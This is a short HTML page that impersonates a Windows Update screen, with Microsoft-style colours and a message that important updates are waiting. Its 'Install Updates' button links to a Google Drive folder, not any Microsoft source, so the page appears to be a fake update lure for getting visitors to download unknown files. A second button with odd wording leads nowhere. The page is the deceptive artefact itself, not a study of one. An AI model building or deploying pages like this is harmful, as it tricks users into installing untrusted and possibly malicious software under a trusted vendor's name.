<!DOCTYPE html>
<html>
<head>
  <title>Windows Update</title>
  <style>
    body {
      background-color: #0078D7;
      color: #FFF;
      font-family: Arial, sans-serif;
    }
    .container {
      max-width: 600px;
      margin: 0 auto;
      padding: 20px;
      text-align: center;
    }
    h1 {
      font-size: 36px;
      margin-bottom: 20px;
    }
    p {
      font-size: 18px;
      margin-bottom: 10px;
    }
    .button {
      background-color: #FFF;
      color: #333;
      padding: 10px 20px;
      text-decoration: none;
      border-radius: 4px;
      font-weight: bold;
    }
  </style>
</head>
<body>
  <div class="container">
    <h1>Windows Update</h1>
    <p>There are important updates available for your computer.</p>
    <p>Click the button below to install the updates.</p>
    <a href="https://drive.google.com/drive/folders/1UsXWEm2CX8yisgW_h4NbCBV4NJ1xgOQw?usp=drive_link" class="button">Install Updates</a>
     <a href="###" class="button">Install a new day</a>
  </div>
</body>
</html>